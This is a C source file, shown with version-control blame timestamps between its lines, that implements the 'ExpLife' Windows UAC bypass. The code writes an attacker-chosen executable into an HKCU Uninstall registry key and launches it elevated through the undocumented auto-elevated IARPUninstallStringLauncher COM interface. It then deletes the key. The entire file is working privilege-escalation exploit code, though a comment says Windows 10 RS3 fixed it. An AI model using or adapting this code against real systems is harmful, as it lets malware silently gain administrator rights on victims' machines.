2017-02-09 07:37:03 +00:00
|
|
|
/*******************************************************************************
|
|
|
|
|
*
|
2019-03-19 08:47:16 +00:00
|
|
|
* (C) COPYRIGHT AUTHORS, 2016 - 2019
|
2017-02-09 07:37:03 +00:00
|
|
|
*
|
|
|
|
|
* TITLE: EXPLIFE.C
|
|
|
|
|
*
|
2019-03-19 08:47:16 +00:00
|
|
|
* VERSION: 3.17
|
2017-02-09 07:37:03 +00:00
|
|
|
*
|
2019-03-19 08:47:16 +00:00
|
|
|
* DATE: 18 Mar 2019
|
2017-02-09 07:37:03 +00:00
|
|
|
*
|
|
|
|
|
* ExpLife UAC bypass using IARPUninstallStringLauncher.
|
|
|
|
|
* For description please visit original URL
|
|
|
|
|
* http://www.freebuf.com/articles/system/116611.html
|
|
|
|
|
*
|
|
|
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
|
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
|
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
|
|
|
* PARTICULAR PURPOSE.
|
|
|
|
|
*
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
#include "global.h"
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* ucmMasqueradedAPRLaunchFile
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Initialize interface and run required method.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
BOOL ucmMasqueradedAPRLaunchFile(
|
|
|
|
|
_In_ LPWSTR lpszFileGuid
|
|
|
|
|
)
|
|
|
|
|
{
|
|
|
|
|
HRESULT r = E_FAIL;
|
|
|
|
|
IARPUninstallStringLauncher *USLauncher = NULL;
|
|
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
r = ucmAllocateElevatedObject(
|
|
|
|
|
T_CLSID_UninstallStringLauncher,
|
|
|
|
|
&IID_IARPUninstallStringLauncher,
|
|
|
|
|
CLSCTX_LOCAL_SERVER,
|
|
|
|
|
&USLauncher);
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
if ((SUCCEEDED(r)) && (USLauncher)) {
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
r = USLauncher->lpVtbl->LaunchUninstallStringAndWait(
|
|
|
|
|
USLauncher,
|
|
|
|
|
0,
|
|
|
|
|
lpszFileGuid,
|
|
|
|
|
FALSE,
|
|
|
|
|
NULL);
|
2018-02-09 07:12:27 +00:00
|
|
|
|
2017-02-09 07:37:03 +00:00
|
|
|
USLauncher->lpVtbl->Release(USLauncher);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return SUCCEEDED(r);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* ucmUninstallLauncherMethod
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Bypass UAC using AutoElevated undocumented IARPUninstallStringLauncher interface.
|
|
|
|
|
*
|
2018-02-09 07:12:27 +00:00
|
|
|
* Fixed in Windows 10 RS3
|
|
|
|
|
*
|
2017-02-09 07:37:03 +00:00
|
|
|
*/
|
2019-03-19 08:47:16 +00:00
|
|
|
NTSTATUS ucmUninstallLauncherMethod(
|
2017-02-09 07:37:03 +00:00
|
|
|
_In_ LPWSTR lpszExecutable
|
|
|
|
|
)
|
|
|
|
|
{
|
2019-03-19 08:47:16 +00:00
|
|
|
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
|
2018-09-02 07:28:59 +00:00
|
|
|
HRESULT hr_init;
|
2017-05-02 06:47:46 +00:00
|
|
|
SIZE_T cbData;
|
2017-02-09 07:37:03 +00:00
|
|
|
HKEY hKey = NULL;
|
|
|
|
|
GUID guid;
|
|
|
|
|
WCHAR szKeyName[MAX_PATH], szGuid[64];
|
|
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
if (CoCreateGuid(&guid) == S_OK) {
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2018-08-05 05:26:27 +00:00
|
|
|
_strcpy(szKeyName, T_UNINSTALL);
|
2017-03-08 06:51:38 +00:00
|
|
|
if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
_strcat(szKeyName, szGuid);
|
2018-12-12 07:44:47 +00:00
|
|
|
if (ERROR_SUCCESS == RegCreateKeyEx(
|
2018-09-02 07:28:59 +00:00
|
|
|
HKEY_CURRENT_USER,
|
|
|
|
|
szKeyName,
|
|
|
|
|
0,
|
|
|
|
|
NULL,
|
|
|
|
|
REG_OPTION_NON_VOLATILE,
|
|
|
|
|
MAXIMUM_ALLOWED,
|
|
|
|
|
NULL,
|
|
|
|
|
&hKey,
|
2018-12-12 07:44:47 +00:00
|
|
|
NULL))
|
2018-09-02 07:28:59 +00:00
|
|
|
{
|
|
|
|
|
cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);
|
2018-12-12 07:44:47 +00:00
|
|
|
if (ERROR_SUCCESS == RegSetValueEx(
|
2018-09-02 07:28:59 +00:00
|
|
|
hKey,
|
|
|
|
|
T_UNINSTALL_STRING,
|
|
|
|
|
0,
|
|
|
|
|
REG_SZ,
|
|
|
|
|
(BYTE*)lpszExecutable,
|
2018-12-12 07:44:47 +00:00
|
|
|
(DWORD)cbData))
|
2018-12-11 13:12:41 +00:00
|
|
|
{
|
2019-03-19 08:47:16 +00:00
|
|
|
if (ucmMasqueradedAPRLaunchFile(szGuid))
|
|
|
|
|
MethodResult = STATUS_SUCCESS;
|
2018-09-02 07:28:59 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
RegCloseKey(hKey);
|
|
|
|
|
RegDeleteKey(HKEY_CURRENT_USER, szKeyName);
|
|
|
|
|
}
|
2017-03-08 06:51:38 +00:00
|
|
|
}
|
2017-02-09 07:37:03 +00:00
|
|
|
}
|
|
|
|
|
|
2018-09-02 07:28:59 +00:00
|
|
|
if (hr_init == S_OK)
|
|
|
|
|
CoUninitialize();
|
2017-02-09 07:37:03 +00:00
|
|
|
|
2019-03-19 08:47:16 +00:00
|
|
|
return MethodResult;
|
2017-02-09 07:37:03 +00:00
|
|
|
}
|
